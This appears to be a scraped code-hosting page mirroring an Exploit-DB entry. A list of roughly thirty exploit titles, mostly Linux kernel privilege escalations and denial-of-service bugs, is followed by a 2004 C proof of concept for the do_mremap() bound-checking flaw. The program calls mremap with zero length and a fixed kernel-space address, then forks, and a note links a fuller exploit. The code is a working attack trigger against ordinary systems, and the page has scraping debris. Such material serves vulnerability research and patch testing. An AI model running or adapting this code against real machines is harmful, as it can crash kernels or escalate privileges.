38038a7128
6 new exploits Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow UCanCode - Multiple Vulnerabilities Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1) Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2) Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1) Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2) Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service (PoC) Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Privilege Escalation Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2) Linux Kernel 2.6.18 - 'move_pages()' Information Leak Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak Linux Kenrel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation Windows x64 - Download & Execute Shellcode (358 bytes)
55 lines
1.7 KiB
C
Executable file
55 lines
1.7 KiB
C
Executable file
/*
|
|
* EDB Note: This will just "test" the vulnerability.
|
|
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
|
|
*/
|
|
|
|
/*
|
|
* Proof-of-concept exploit code for do_mremap()
|
|
*
|
|
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
|
|
*
|
|
* This program is free software; you can redistribute it and/or modify
|
|
* it under the terms of the GNU General Public License as published by
|
|
* the Free Software Foundation; either version 2 of the License, or
|
|
* (at your option) any later version.
|
|
*
|
|
* This program is distributed in the hope that it will be useful,
|
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
* GNU General Public License for more details.
|
|
*
|
|
* You should have received a copy of the GNU General Public License
|
|
* along with this program; if not, write to the Free Software
|
|
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
|
|
*/
|
|
|
|
#include <asm/unistd.h>
|
|
#include <sys/mman.h>
|
|
#include <unistd.h>
|
|
#include <errno.h>
|
|
|
|
#define MREMAP_MAYMOVE 1
|
|
#define MREMAP_FIXED 2
|
|
|
|
#define __NR_real_mremap __NR_mremap
|
|
|
|
static inline _syscall5( void *, real_mremap, void *, old_address,
|
|
size_t, old_size, size_t, new_size,
|
|
unsigned long, flags, void *, new_address );
|
|
|
|
int main( void )
|
|
{
|
|
void *base;
|
|
|
|
base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
|
|
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
|
|
|
|
real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
|
|
(void *) 0xC0000000 );
|
|
|
|
fork();
|
|
|
|
return( 0 );
|
|
}
|
|
|
|
// milw0rm.com [2004-01-06]
|